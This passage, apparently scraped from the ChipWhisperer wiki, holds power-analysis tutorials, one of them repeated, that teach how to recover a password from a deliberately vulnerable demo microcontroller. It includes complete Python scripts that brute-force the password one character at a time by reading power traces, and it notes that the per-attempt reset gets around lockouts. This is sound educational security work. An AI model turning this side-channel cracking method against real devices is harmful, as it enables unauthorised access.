<blockquote><ol style="list-style-type: lower-roman;">
<li>If you installed WinPython, run the ''WinPython Console'' from your WinPython installation directory.</li>
<li>If using the VMWare image of a Linux machine, this should just be a regular console</li></ol>
</blockquote></li></ol>
<blockquote>Run the script with <code>python cwlite-passwordcrack.py</code>. If the script errors out, it might be that the location of the FPGA bitstream is stored in relative terms. To fix this perform the following:
<blockquote><ol style="list-style-type: lower-roman;">
<li>Open ChipWhisperer-Capture regularly.</li>
<li>Run the ChipWhisperer script that you used previously.</li>
<li>Select ''Tools-->Config CW Firmware''</li>
<li>Under the "FPGA .zip (Release)", hit the "Find" button. Point the system to the file <code>chipwhisperer/hardware/capture/chipwhisperer-lite/cwlite_firmware.zip</code> on your filesystem. Note by default there is a relative path.</li></ol>
</blockquote></blockquote>

<ol start="4" style="list-style-type: decimal;">
<li>Once again on the ''Target Settings'' tab, delete the various commands. Make a note of the resulting ''Script Commands'' which you will need to enter to achieve this same goal. Close ChipWhisperer-Capture.</li>
<li>Continue editing your script. First, find the line setting the Trigger Offset:
<pre>['OpenADC', 'Trigger Setup', 'Offset', 1500],</pre>
And set this to 0, which we were using previously:
<pre>['OpenADC', 'Trigger Setup', 'Offset', 0],</pre></li>
<li>Next, append the required commands to clear the simpleserial commands and to enable the automatic resets:
<pre>#Example of using a list to set parameters. Slightly easier to copy/paste in this format
lstexample = [['CW Extra', 'CW Extra Settings', 'Trigger Pins', 'Target IO4 (Trigger Line)', True],
...BUNCH MORE COMMANDS HERE HAVE BEEN REMOVED...
#Final step: make DCMs relock in case they are lost
['OpenADC', 'Clock Setup', 'ADC Clock', 'Reset ADC DCM', None],

#Append your commands here
['Simple Serial', 'Load Key Command', u''],
['Simple Serial', 'Go Command', u''],
['Simple Serial', 'Output Format', u''],

['Generic Settings', 'Auxiliary Module', 'Reset AVR/XMEGA via CW-Lite'],
['Aux Settings', 'Reset AVR/XMEGA via CW-Lite', 'Delay (Post-Arm)', 1200],
]</pre></li>

<li>Finally, we will set the password. You can enter the password in the Capture ''Target Settings'' tab, and see the following sort of call would set the appropriate password:
<pre>self.api.setParameter(['Simple Serial', 'Go Command', u'h0px3\\n'])</pre>
Note the newline is actually escaped, to set the text equivalent of what will be printed. This will result in an actual newline going out across the serial port. Set that command at some point in your script.
<li>Close any open ChipWhisperer-Capture windows, and run the script as before. You should connect to the target, and be able to press ''Capture 1'' and see the correct waveform.</li>
</ol>

== Running a Single Capture ==
With our settings prepared, the next step is to use our script to record and analyze a power trace. We need to be able to get the trace data into our Python script so we can analyze it for the timing attack.

The API allows us to ''press the Capture 1'' button and ''view the power trace'' without using the GUI. There are two relevant commands here:
* <code> self.api.capture1()</code> acts as if we've just pressed the ''Capture 1'' button;
* <code> self.api.getScope().channels[0].getTrace()</code> returns a list of datapoints that were recorded in the previous capture.
We want to test these two commands. After the setup portion of your script, add some code similar to the following:
<pre>
self.api.capture1()
data = self.api.getScope().channels[0].getTrace()
print data
</pre>
Run your script. The ChipWhisperer should automatically capture one trace and print out the several thousand datapoints. This is all we need to continue.

== Attacking a Single Letter ==
Now that we can record one power trace, we can start the timing attack. Our goal here is to automatically find the first letter of the Super Secret (tm) password.

<li>Look at this example of the power traces when 0 and 1 bytes are correct. We can see a clear point that appears to shift forward in time:
<blockquote>[[File:Passwordcrackerpts.png|image]]</blockquote>
When we guess the first byte incorrectly, there is a distinct power spike at sample number 153. However, when we guess correctly, the target spends more time processing the password, and this spike moves 72 samples forward. This means that we can check if our first byte is correct by checking this data point: if we're right, it will have an amplitude greater than -0.2. Note the specific point will change for different hardware, and may also change if you use different versions of avr-gcc to compile the target code. The example code here was compiled with WinAVR 20100110, which has avr-gcc 4.3.3. If you view the video version of this tutorial the point numbers are different for example, so be sure to check what they are for your specific system.</li>

<li> Add a loop to your script that does the following:
* Sets the ''Go Command'' to the next character we want to try
* Captures a power trace
* Checks if sample 153 is above -0.2 (fill in the appropriate numbers here)
* Repeats for all characters we want to try
An example of this loop is:
<pre>
trylist = 'abcdefghijklmnopqrstuvwxyz0123456789'

for c in trylist:
# Test this password and record a power trace
self.api.setParameter(['Simple Serial', 'Go Command', c + '\n'])
self.api.capture1()

# Get the data and check data[153]
data = self.api.getScope().channels[0].getTrace()
if data[153] > -0.2:
print "Success: " + c
</pre>
This script will eventually stop, but you can use Ctrl+C on the command line to kill it. Make sure your script prints "Success: h"!
</li>

== Attacking the Full Password ==
The last step is to attack the entire password, one letter at a time. The procedure to do this is:
* Start with a blank password string
* Loop through all of the characters we want to try:
** Add the next character to the end of the password
** Test this new candidate password using code similar to the above
** If the new password is correct up to character (1, 2, ..., 5), add it to the end of the password
* Repeat until we've cracked all 5 characters.

Note that the point of interest is no longer at sample 153. We noticed earlier that this key point moves 72 samples forward for every correct character, so we'll have to check location <code>153</code> for character 0, <code>153 + 72</code> for character 1, and <code>153 + i*72</code> for character <code>i</code>.

An example of this loop is:
<pre>
password = ''
trylist = 'abcdefghijklmnopqrstuvwxyz0123456789'

for i in range(5):
for c in trylist:
# Get a power trace using our next attempt
nextPass = password + '{}'.format(c)
self.api.setParameter(['Simple Serial', 'Go Command', '{}\n'.format(nextPass)])
self.api.capture1()

# Grab the trace
nextTrace = self.api.getScope().channels[0].getTrace()

# Check location 153, 225, etc. If it's too low, we've failed
if nextTrace[153 + 72*i] < -0.2:
continue

# If we got here, we've found the right letter
password += c
print '{} characters: {}'.format(i+1, password)
break
</pre>
After some time, this prints <code>5 characters: h0px3</code> -- it automatically finds the correct password.

That's it! You should have successfully cracked a password using the timing attack. Some notes on this method:

* The target device has a finite start-up time, which slows down the attack. If you wish, remove some of the printf()'s from the target code, recompile and reprogram, and see how quickly you can do this attack.
* The current script doesn't look for the "WELCOME" message when the password is OK. That is an extension that allows it to crack any size password.
* If there was a lock-out on a wrong password, the system would ignore it, as it resets the target after every attempt.

= Conclusion =

This tutorial has demonstrated the use of the power side-channel for performing timing attacks. A target with a simple password-based security system is broken. In addition you have learned about the scripting support in the ChipWhisperer-Capture software.

= Appendix: Completed Timing Attack Script =
The <code>run()</code> function at the end of the tutorial might look something like the following:
<pre>
def run(self):
# This is the function that gets called when our script starts

# First: set up the basics and connect to the CW-Lite
self.api.setParameter(['Generic Settings', 'Scope Module', 'ChipWhisperer/OpenADC'])
self.api.setParameter(['Generic Settings', 'Target Module', 'Simple Serial'])
self.api.setParameter(['Generic Settings', 'Trace Format', 'ChipWhisperer/Native'])
self.api.setParameter(['Simple Serial', 'Connection', 'ChipWhisperer-Lite'])
self.api.setParameter(['ChipWhisperer/OpenADC', 'Connection', 'ChipWhisperer-Lite'])
self.api.connect()

# Next: set up everything we need to connect to the target
# Put all of our commands in a list and execute them at the end
lstexample = [
# Gain
['OpenADC', 'Gain Setting', 'Setting', 45],
# Trigger
['OpenADC', 'Trigger Setup', 'Mode', 'rising edge'],
['OpenADC', 'Trigger Setup', 'Offset', 0],
['OpenADC', 'Trigger Setup', 'Total Samples', 2000],
# Clock
['OpenADC', 'Clock Setup', 'CLKGEN Settings', 'Desired Frequency', 7370000.0],
['OpenADC', 'Clock Setup', 'ADC Clock', 'Source', 'CLKGEN x4 via DCM'],
['OpenADC', 'Clock Setup', 'ADC Clock', 'Reset ADC DCM', None],
# Pins
['CW Extra Settings', 'Trigger Pins', 'Target IO4 (Trigger Line)', True],
['CW Extra Settings', 'Target HS IO-Out', 'CLKGEN'],
['CW Extra Settings', 'Target IOn Pins', 'Target IO1', 'Serial RXD'],
['CW Extra Settings', 'Target IOn Pins', 'Target IO2', 'Serial TXD'],
# Automatic commands
['Simple Serial', 'Load Key Command', ''],
['Simple Serial', 'Go Command', 'h0px3\n'],
['Simple Serial', 'Output Format', ''],
# Auto-reset
['Generic Settings', 'Auxiliary Module', 'Reset AVR/XMEGA via CW-Lite'],
['Aux Settings', 'Reset AVR/XMEGA via CW-Lite', 'Delay (Post-Arm)', 1200],
]

#Download all hardware setup parameters
for cmd in lstexample:
self.api.setParameter(cmd)

# Get one capture for fun
self.api.capture1()
data = self.api.getScope().channels[0].getTrace()
print data

# Crack the first letter
password = ''
trylist = 'abcdefghijklmnopqrstuvwxyz0123456789'

for i in range(5):
for c in trylist:
# Get a power trace using our next attempt
nextPass = password + '{}'.format(c)
self.api.setParameter(['Simple Serial', 'Go Command', '{}\n'.format(nextPass)])
self.api.capture1()

# Grab the trace
nextTrace = self.api.getScope().channels[0].getTrace()

# Check location 153, 225, etc. If it's too low, we've failed
if nextTrace[153 + 72*i] < -0.2:
continue

# If we got here, we've found the right letter
password += c
print '{} characters: {}'.format(i+1, password)
break
</pre>

{{Template:Tutorials}}
[[Category:Tutorials]]

Tutorial B3-1 Timing Analysis with Power for Password Bypass

2017-07-21T23:16:25Z

DavidRysk: Some updates for current code

This tutorial will introduce you to breaking devices by determining when a device is performing certain operations. It will use a simple password check, and demonstrate how to perform a basic power analysis.

In addition this example shows you how to drive the ChipWhisperer software with a script, rather than using the GUI. This will be required when attacking new devices which you have not yet added to the core ChipWhisperer software.

Note this is not a prerequisite to the tutorial on breaking AES. You can skip this tutorial if you wish to go ahead with the AES tutorial.

You can also view a 53-min [https://www.youtube.com/watch?v=h4eAU6vEONs&hd=1 Video Version on YouTube]:

= Prerequisites =

You should have already completed [[Tutorial B2 Viewing Instruction Power Differences]] to gain a better understanding of the ChipWhisperer interface.

= Building the Target Firmware =

The target firmware is located in the directory <code>chipwhisperer\hardware\victims\firmware\basic-passwdcheck</code>. Build the firmware using <code>make</code>, once again being careful to ensure you are using the correct <code>PLATFORM=</code> command. You should end up with something like this being printed:

<pre>Creating Symbol Table: basic-passwdcheck.sym
avr-nm -n basic-passwdcheck.elf > basic-passwdcheck.sym

Size after:
AVR Memory Usage
----------------
Device: atxmega128d3

Program: 5400 bytes (3.9% Full)
(.text + .data + .bootloader)

Data: 524 bytes (6.4% Full)
(.data + .bss + .noinit)

Built for platform CW-Lite XMEGA

-------- end --------</pre>

= Manual Communications with the Target =

At this point, you should be able to configure the target as in the previous tutorials. Rather than tediously going through the setup process again, we'll simply use one of the scripts built into the ChipWhisperer-Capture software. This will demonstrate how we can use a script as a starting point to simplify our setup.

<ol style="list-style-type: decimal;">
<li>Connect your target hardware (ChipWhisperer-Lite/Pro or ChipWhisperer-Capture Rev 2 with target board).</li>
<li>Open the ChipWhisperer-Capture software.</li>
<li>From the ''Example Scripts'', select one which most closely matches your hardware. For example here I'm using a ChipWhisperer-Lite with the XMEGA target, so will select the "ChipWhisperer-Lite: AES SimpleSerial on XMEGA" script. Note I'm ''NOT'' attacking AES, so will need to make some adjustments later. (The "Timing Attack on CW-Lite (XMEGA)" script already does most of this for us, so using it would defeat the purpose of this tutorial.)</li>
<li>The system should connect to your hardware. Remember you have not yet reprogrammed the target so won't be communicating with the target program.</li>
<li>Using the programming tool (such as XMEGA programming dialog), program the file <code>basic-passwdcheck.hex</code> into the target device. This file is located where you ran <code>make</code> previously.</li>
<li>Select ''Tools --> Terminal'', and press ''Connect''. You should see a window such as this:
<blockquote>[[File:Termconn.png|image]]</blockquote></li>
<li>At this point we need to reset the target device. The easiest way to do this is use the programmer interface, and press the ''Check Signature'' or ''Read Signature'' button. This will reset the target device as part of the signature read operation. You should see some messages come across the terminal emulator window:
<blockquote>[[File:Checksig_print.png|image]]</blockquote>
<dl>
<dt>Note a few warnings about the terminal emulator:</dt>
<dd><ul>
<li>The on-board buffer is fairly small, and can be easily overflowed. You may notice a few longer lines become trunicated if printing is too fast!</li>
<li>You can uncheck the "Show non-ASCII as hex" to avoid having the <code>0a</code> printed in red. The <code>0a</code> is the hex character for a newline. Many protocols use non-ASCII characters, so to help with debugging it is left enabled by default.</li></ul>
</dd></dl>
</li>
<li>We've now got some super-secure system! Let's begin with some exploratory tests - in this case I happened to know the correct password is <code>h0px3</code>.
<blockquote>'''tip'''
In real systems, you may often know ''one'' of the passwords, which is sufficient to investigate the password checking routines as we will do. You also normally have an ability to reset passwords to default. While the reset procedure would erase any data you care about, the attacker will be able to use this 'sacrificial' device to learn about possible vulnerabilites. So the assumption that we have access to the password is really just saying we have access to ''a'' password, and will use that knowledge to break the system in general.</blockquote></li>
<li>Using the terminal emulator, write the correct password in, and press <code><enter></code>. You should be greeted by a welcome message, and if using the CW-Lite XMEGA target the green LED will illuminate:
[[File:Passok.png|image]]</li>
<li>The system enters an infinite loop for any password entry. Thus you must reset the system, use the ''Programmer Window'' to again perform a ''Check Signature'' or ''Read Signature'' operation.</li>
<li>Enter an incorrect password - notice a different message is printed, and if using the CW-Lite XMEGA target the red LED will come on.</li></ol>

= Recording Power Traces =
Now that we can communicate with our super-secure system, our next goal is to get a power trace while the target is running. To do this, we'll get the power measurements to trigger after we send our password to the target.

<ol style="list-style-type: decimal;">
<li>We'll make some changes to the trigger setup of the ChipWhisperer (on the Scope Settings tab). In particular, ensure you set the following:
<blockquote><ul>
<li>Offset = 0</li>
<li>Timeout set to 5 seconds or greater (to give yourself time when manually testing)</li></ul>

[[File:Timeout_offset.png|image]]</blockquote></li>
<li>Change to the ''Target Settings'' tab, and delete the ''Command'' strings. Those strings are used in the AES attack to send a specific command to the target device, for now we will be manually sending data:
<blockquote>[[File:Text_targetsettings.png|image]]</blockquote></li>
<li>Still in the ''Target Settings'' tab, under ''Protocol Version'', change ''Version'' from ''Auto'' to ''1.0''
<li>Perform the following actions:
<blockquote><ol style="list-style-type: lower-roman;">
<li>Reset the target device (e.g. by performing the signature check).</li>
<li>Enter the password <code>h0px3</code> in the terminal window, but ''do not'' yet hit enter.</li>
<li>Press the ''Capture 1'' button, and immediately switch to the terminal emulator window and press <code><enter></code> to send the password.</li></ol>
</blockquote>
You must send the password before the timeout occurs -- you can increase the length of the timeout if needed to give yourself more time! If this works you should see the power consumption displayed in the GUI:
<blockquote>[[File:Trace_manual_pass.png|image]]</blockquote></li>

<li>Rather than using the manual terminal, let's now use the GUI to automatically send a password try. Switching back to the ''Target Settings'' tab, write <code>h0px3\n</code> into the ''Go Command'' option:
<blockquote>[[File:Gocorrect.png|image]]</blockquote>
The ''Go Command'' is sent right after the scope is armed. In this example it means we can capture the power consumption during the password entry phase.</li>
<li>Now perform the following actions:
<blockquote><ol style="list-style-type: lower-roman;">
<li>Reset the target device (e.g. by performing the signature check).</li>
<li>Press the ''Capture 1'' button.</li></ol>
</blockquote>
Hopefully this resulted in the same waveform as before! Note the device takes around 1 second to 'boot', so if you are too lightning fast after resetting the device it won't actually be ready to accept the password. You can keep the terminal emulator window open to view the output data.</li>
<li>Play around with the password entered on the ''Go Command'' - try all of the following:
<ul>
<li><code>h0px3\n</code></li>
<li><code>h0px4\n</code></li>
<li><code>h0paa\n</code></li>
<li><code>haaaa\n</code></li>
<li><code>a\n</code></li></ul>

You should notice a distinct change in the password depending how many characters were correct. For example the following shows the difference between passwords of <code>h0px4</code> (which has 4 correct characters) and <code>h0paa</code> (which has 3 correct characters):
<blockquote>[[File:3vs4.png|image]]</blockquote></li></ol>

= Automatic Resets =
The last step before scripting an entire attack is to figure out how to automatically reset the target device before (or after) each capture. There are two ways to do this, and the following steps take you through two examples of how to accomplish this goal.

== Reset via Spare IO Lines ==

TODO - see reset via programming interface for now

== Reset via Auxiliary Module ==

Auxiliary modules are small pieces of code that can perform some extra functions during the capture process. The functions inside these Python modules are run before a capture, before the power measurement is armed, before the measurement is triggered, after a single trace is completed, and after an entire capture is finished. We will use an existing auxiliary module to reset the target chip before arming the measurement so that we don't have to manually reset the device.

<ol style="list-style-type: decimal;">
<li> We're going to use the ''Reset AVR/XMEGA via CW-Lite'' auxiliary module. Let's get an idea of how this module works:
* Navigate to the auxiliary modules folder (<code>chipwhisperer\software\chipwhisperer\capture\auxiliary\</code>) and open <code>ResetCW1183Read.py</code> in your choice of text editor.
* Find the function definition for <code>resetDevice()</code>. It contains a line that looks like:
<pre>
CWCoreAPI.getInstance().getScope().scopetype.cwliteXMEGA.readSignature()
</pre>
* Look for the lines where this function gets called. You'll find that the function <code>traceArm()</code> uses it like:
<pre>
resettiming = self.findParam('resettiming').value()
if resettiming == 'Pre-Arm':
self.resetDevice()
</pre>
Effectively, this code will read the target's signature before we arm the power measurement. This means that the target will automatically be reset before capturing a power trace.
</li>

<li> Go back to the ChipWhisperer Capture software. In the ''Generic Settings'' tab, switch the Auxiliary Module to ''Reset AVR/XMEGA via CW-Lite''.
</li>
<li> Now, in the ''Aux Settings'' tab, we can configure our automatic reset. Make sure the settings are:
* Pre-arm delay: roughly 1200 ms
* Post-arm delay: the default (0 ms) is fine
* Reset timing: Pre-arm (reset the device before we arm the scope)
</li>
<li> Press ''Capture 1''. The target will automatically reset, with the Safe-o-matic 3000 boot sequence appearing in the console. Then, 1 second later, the program will send the password to the target and record a power trace.
</li>
</ol>

Now, confirm that you can try different passwords (in ''Target Settings'') and see how the power trace changes when your password has 0, 1, 2... correct characters.

= Performing the Timing Attack =
So far, we've set up our ChipWhisperer to automatically reset the target, send it a password attempt of our choice, and record a power trace while the target processes the password. Now, we'll write a Python script to automatically try different passwords and use these power traces to discover the password stored on the target.

== Scripting the Setup ==
Our first step will be to write a script that automatically sets up the ChipWhisperer Capture software with all of the settings we've tested above. We'll do this by modifying an existing script with our own settings.

<ol style="list-style-type: decimal;">
<li>Make a copy of an existing ChipWhisperer script. The example scripts are located at <code>chipwhisperer\software\chipwhisperer\capture\scripts</code>; for example, the default one for the XMEGA device is called <code>cwlite-simpleserialxmega.py</code>. Make a copy of this script and put it somewhere memorable.
</li>
<li>Rename the script something else - for example, <code>cwlite-passwordcrack.py</code> - and open it for editing. You'll notice that a large chunk of the code is used to set the parameters:
<pre>#Example of using a list to set parameters. Slightly easier to copy/paste in this format
lstexample = [['CW Extra', 'CW Extra Settings', 'Trigger Pins', 'Target IO4 (Trigger Line)', True],
['CW Extra', 'CW Extra Settings', 'Target IOn Pins', 'Target IO1', 'Serial RXD'],
['CW Extra', 'CW Extra Settings', 'Target IOn Pins', 'Target IO2', 'Serial TXD'],
['OpenADC', 'Clock Setup', 'CLKGEN Settings', 'Desired Frequency', 7370000.0],
['CW Extra', 'CW Extra Settings', 'Target HS IO-Out', 'CLKGEN'],
['OpenADC', 'Clock Setup', 'ADC Clock', 'Source', 'CLKGEN x4 via DCM'],
['OpenADC', 'Trigger Setup', 'Total Samples', 3000],
['OpenADC', 'Trigger Setup', 'Offset', 1500],
['OpenADC', 'Gain Setting', 'Setting', 45],
['OpenADC', 'Trigger Setup', 'Mode', 'rising edge'],
#Final step: make DCMs relock in case they are lost
['OpenADC', 'Clock Setup', 'ADC Clock', 'Reset ADC DCM', None],
]</pre>
Those parameters come from the ''Scripting Parameters'' tab. Switch over to it and notice this tab logs all of the parameter changes, showing you how to change the parameters through the API:
<blockquote>[[File:Scriptcommands.png|image]]</blockquote>
Note that commands run via the script are also printed, so you can see where the values being set are coming from too. 
</li>

<li>At this point, close the ''ChipWhisperer-Capture'' window so we can confirm the script still works. Run the new script (which doesn't have any changes yet) from the command line. You may have to open a console with Python in the path:
<blockquote><ol style="list-style-type: lower-roman;">
<li>If you installed WinPython, run the ''WinPython Console'' from your WinPython installation directory.</li>
<li>If using the VMWare image of a Linux machine, this should just be a regular console</li></ol>
</blockquote></li></ol>
<blockquote>Run the script with <code>python cwlite-passwordcrack.py</code>. If the script errors out, it might be that the location of the FPGA bitstream is stored in relative terms. To fix this perform the following:
<blockquote><ol style="list-style-type: lower-roman;">
<li>Open ChipWhisperer-Capture regularly.</li>
<li>Run the ChipWhisperer script that you used previously.</li>
<li>Select ''Tools-->Config CW Firmware''</li>
<li>Under the "FPGA .zip (Release)", hit the "Find" button. Point the system to the file <code>chipwhisperer/hardware/capture/chipwhisperer-lite/cwlite_firmware.zip</code> on your filesystem. Note by default there is a relative path.</li></ol>
</blockquote></blockquote>

<ol start="4" style="list-style-type: decimal;">
<li>Once again on the ''Target Settings'' tab, delete the various commands. Make a note of the resulting ''Script Commands'' which you will need to enter to achieve this same goal. Close ChipWhisperer-Capture.</li>
<li>Continue editing your script. First, find the line setting the Trigger Offset:
<pre>['OpenADC', 'Trigger Setup', 'Offset', 1500],</pre>
And set this to 0, which we were using previously:
<pre>['OpenADC', 'Trigger Setup', 'Offset', 0],</pre></li>
<li>Next, append the required commands to clear the simpleserial commands and to enable the automatic resets:
<pre>#Example of using a list to set parameters. Slightly easier to copy/paste in this format
lstexample = [['CW Extra', 'CW Extra Settings', 'Trigger Pins', 'Target IO4 (Trigger Line)', True],
...BUNCH MORE COMMANDS HERE HAVE BEEN REMOVED...
#Final step: make DCMs relock in case they are lost
['OpenADC', 'Clock Setup', 'ADC Clock', 'Reset ADC DCM', None],

#Append your commands here
['Simple Serial', 'Load Key Command', u''],
['Simple Serial', 'Go Command', u''],
['Simple Serial', 'Output Format', u''],

['Generic Settings', 'Auxiliary Module', 'Reset AVR/XMEGA via CW-Lite'],
['Aux Settings', 'Reset AVR/XMEGA via CW-Lite', 'Delay (Post-Arm)', 1200],
]</pre></li>

<li>Finally, we will set the password. You can enter the password in the Capture ''Target Settings'' tab, and see the following sort of call would set the appropriate password:
<pre>self.api.setParameter(['Simple Serial', 'Go Command', u'h0px3\\n'])</pre>
Note the newline is actually escaped, to set the text equivalent of what will be printed. This will result in an actual newline going out across the serial port. Set that command at some point in your script.
<li>Close any open ChipWhisperer-Capture windows, and run the script as before. You should connect to the target, and be able to press ''Capture 1'' and see the correct waveform.</li>
</ol>

== Running a Single Capture ==
With our settings prepared, the next step is to use our script to record and analyze a power trace. We need to be able to get the trace data into our Python script so we can analyze it for the timing attack.

The API allows us to ''press the Capture 1'' button and ''view the power trace'' without using the GUI. There are two relevant commands here:
* <code> self.api.capture1()</code> acts as if we've just pressed the ''Capture 1'' button;
* <code> self.api.getScope().channels[0].getTrace()</code> returns a list of datapoints that were recorded in the previous capture.
We want to test these two commands. After the setup portion of your script, add some code similar to the following:
<pre>
self.api.capture1()
data = self.api.getScope().channels[0].getTrace()
print data
</pre>
Run your script. The ChipWhisperer should automatically capture one trace and print out the several thousand datapoints. This is all we need to continue.

== Attacking a Single Letter ==
Now that we can record one power trace, we can start the timing attack. Our goal here is to automatically find the first letter of the Super Secret (tm) password.

<li>Look at this example of the power traces when 0 and 1 bytes are correct. We can see a clear point that appears to shift forward in time:
<blockquote>[[File:Passwordcrackerpts.png|image]]</blockquote>
When we guess the first byte incorrectly, there is a distinct power spike at sample number 153. However, when we guess correctly, the target spends more time processing the password, and this spike moves 72 samples forward. This means that we can check if our first byte is correct by checking this data point: if we're right, it will have an amplitude greater than -0.2. Note the specific point will change for different hardware, and may also change if you use different versions of avr-gcc to compile the target code. The example code here was compiled with WinAVR 20100110, which has avr-gcc 4.3.3. If you view the video version of this tutorial the point numbers are different for example, so be sure to check what they are for your specific system.</li>

<li> Add a loop to your script that does the following:
* Sets the ''Go Command'' to the next character we want to try
* Captures a power trace
* Checks if sample 153 is above -0.2 (fill in the appropriate numbers here)
* Repeats for all characters we want to try
An example of this loop is:
<pre>
trylist = 'abcdefghijklmnopqrstuvwxyz0123456789'

for c in trylist:
# Test this password and record a power trace
self.api.setParameter(['Simple Serial', 'Go Command', c + '\n'])
self.api.capture1()

# Get the data and check data[153]
data = self.api.getScope().channels[0].getTrace()
if data[153] > -0.2:
print "Success: " + c
</pre>
This script will eventually stop, but you can use Ctrl+C on the command line to kill it. Make sure your script prints "Success: h"!
</li>

== Attacking the Full Password ==
The last step is to attack the entire password, one letter at a time. The procedure to do this is:
* Start with a blank password string
* Loop through all of the characters we want to try:
** Add the next character to the end of the password
** Test this new candidate password using code similar to the above
** If the new password is correct up to character (1, 2, ..., 5), add it to the end of the password
* Repeat until we've cracked all 5 characters.

Note that the point of interest is no longer at sample 153. We noticed earlier that this key point moves 72 samples forward for every correct character, so we'll have to check location <code>153</code> for character 0, <code>153 + 72</code> for character 1, and <code>153 + i*72</code> for character <code>i</code>.

An example of this loop is:
<pre>
password = ''
trylist = 'abcdefghijklmnopqrstuvwxyz0123456789'

for i in range(5):
for c in trylist:
# Get a power trace using our next attempt
nextPass = password + '{}'.format(c)
self.api.setParameter(['Simple Serial', 'Go Command', '{}\n'.format(nextPass)])
self.api.capture1()

# Grab the trace
nextTrace = self.api.getScope().channels[0].getTrace()

# Check location 153, 225, etc. If it's too low, we've failed
if nextTrace[153 + 72*i] < -0.2:
continue

# If we got here, we've found the right letter
password += c
print '{} characters: {}'.format(i+1, password)
break
</pre>
After some time, this prints <code>5 characters: h0px3</code> -- it automatically finds the correct password.

That's it! You should have successfully cracked a password using the timing attack. Some notes on this method:

* The target device has a finite start-up time, which slows down the attack. If you wish, remove some of the printf()'s from the target code, recompile and reprogram, and see how quickly you can do this attack.
* The current script doesn't look for the "WELCOME" message when the password is OK. That is an extension that allows it to crack any size password.
* If there was a lock-out on a wrong password, the system would ignore it, as it resets the target after every attempt.

= Conclusion =

This tutorial has demonstrated the use of the power side-channel for performing timing attacks. A target with a simple password-based security system is broken. In addition you have learned about the scripting support in the ChipWhisperer-Capture software.

= Appendix: Completed Timing Attack Script =
The <code>run()</code> function at the end of the tutorial might look something like the following:
<pre>
def run(self):
# This is the function that gets called when our script starts

# First: set up the basics and connect to the CW-Lite
self.api.setParameter(['Generic Settings', 'Scope Module', 'ChipWhisperer/OpenADC'])
self.api.setParameter(['Generic Settings', 'Target Module', 'Simple Serial'])
self.api.setParameter(['Generic Settings', 'Trace Format', 'ChipWhisperer/Native'])
self.api.setParameter(['Simple Serial', 'Connection', 'ChipWhisperer-Lite'])
self.api.setParameter(['ChipWhisperer/OpenADC', 'Connection', 'ChipWhisperer-Lite'])
self.api.connect()

# Next: set up everything we need to connect to the target
# Put all of our commands in a list and execute them at the end
lstexample = [
# Gain
['OpenADC', 'Gain Setting', 'Setting', 45],
# Trigger
['OpenADC', 'Trigger Setup', 'Mode', 'rising edge'],
['OpenADC', 'Trigger Setup', 'Offset', 0],
['OpenADC', 'Trigger Setup', 'Total Samples', 2000],
# Clock
['OpenADC', 'Clock Setup', 'CLKGEN Settings', 'Desired Frequency', 7370000.0],
['OpenADC', 'Clock Setup', 'ADC Clock', 'Source', 'CLKGEN x4 via DCM'],
['OpenADC', 'Clock Setup', 'ADC Clock', 'Reset ADC DCM', None],
# Pins
['CW Extra Settings', 'Trigger Pins', 'Target IO4 (Trigger Line)', True],
['CW Extra Settings', 'Target HS IO-Out', 'CLKGEN'],
['CW Extra Settings', 'Target IOn Pins', 'Target IO1', 'Serial RXD'],
['CW Extra Settings', 'Target IOn Pins', 'Target IO2', 'Serial TXD'],
# Automatic commands
['Simple Serial', 'Load Key Command', ''],
['Simple Serial', 'Go Command', 'h0px3\n'],
['Simple Serial', 'Output Format', ''],
# Auto-reset
['Generic Settings', 'Auxiliary Module', 'Reset AVR/XMEGA via CW-Lite'],
['Aux Settings', 'Reset AVR/XMEGA via CW-Lite', 'Delay (Post-Arm)', 1200],
]

#Download all hardware setup parameters
for cmd in lstexample:
self.api.setParameter(cmd)

# Get one capture for fun
self.api.capture1()
data = self.api.getScope().channels[0].getTrace()
print data

# Crack the first letter
password = ''
trylist = 'abcdefghijklmnopqrstuvwxyz0123456789'

for i in range(5):
for c in trylist:
# Get a power trace using our next attempt
nextPass = password + '{}'.format(c)
self.api.setParameter(['Simple Serial', 'Go Command', '{}\n'.format(nextPass)])
self.api.capture1()

# Grab the trace
nextTrace = self.api.getScope().channels[0].getTrace()

# Check location 153, 225, etc. If it's too low, we've failed
if nextTrace[153 + 72*i] < -0.2:
continue

# If we got here, we've found the right letter
password += c
print '{} characters: {}'.format(i+1, password)
break
</pre>

{{Template:Tutorials}}
[[Category:Tutorials]]

Tutorial B2 Viewing Instruction Power Differences

2017-07-19T00:07:49Z

DavidRysk: fix line break

This tutorial will introduce you to measuring the power consumption of a device under attack. It will demonstrate how you can view the difference between a 'add' instruction and a 'mul' instruction.

= Prerequisites =

You should have already completed [[Tutorial_B1_Building_a_SimpleSerial_Project]]. This tutorial assumes you are capable of building a new AVR/XMEGA code, programming the code, and connecting to the ChipWhisperer.

= Setting Up the Example =

<ol style="list-style-type: decimal;">
<li>Copy the directory <code>simpleserial-base</code> which is found at <code>chipwhisperer\hardware\victims\firmware\</code> of the chipwhisperer release to a new directory called <code>simpleserial-base-lab2</code>. You must keep it in the same directory, as it will reference other files within that directory for the build process.
If you just completed [[Tutorial_B1_Building_a_SimpleSerial_Project]], you can simply reuse that code (this builds upon it).
At this point we want to modify the system to perform a number of operations. We won't actually use the input data. To do so, open the file <code>simpleserial-base.c</code> with a text editor such as Programmer's Notepad (which ships with WinAVR).</li>
<li>Find the following code block towards the end of the file, which may look different if you just completed [[Tutorial_B1_Building_a_SimpleSerial_Project]].
<source lang="c">/**********************************
* Start user-specific code here. */
trigger_high();

//16 hex bytes held in 'pt' were sent
//from the computer. Store your response
//back into 'pt', which will send 16 bytes
//back to computer. Can ignore of course if
//not needed

trigger_low();
/* End user-specific code here. *
********************************/</source></li>
<li>Modify it to do some work with no-ops and multiplication instructions:
<source lang="c">/**********************************
* Start user-specific code here. */
trigger_high();

//16 hex bytes held in 'pt' were sent
//from the computer. Store your response
//back into 'pt', which will send 16 bytes
//back to computer. Can ignore of course if
//not needed

asm volatile(
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
::
);

asm volatile(
"mul r0,r1" "\n\t"
"mul r0,r1" "\n\t"
"mul r0,r1" "\n\t"
"mul r0,r1" "\n\t"
"mul r0,r1" "\n\t"
"mul r0,r1" "\n\t"
"mul r0,r1" "\n\t"
"mul r0,r1" "\n\t"
"mul r0,r1" "\n\t"
"mul r0,r1" "\n\t"
::
);

trigger_low();
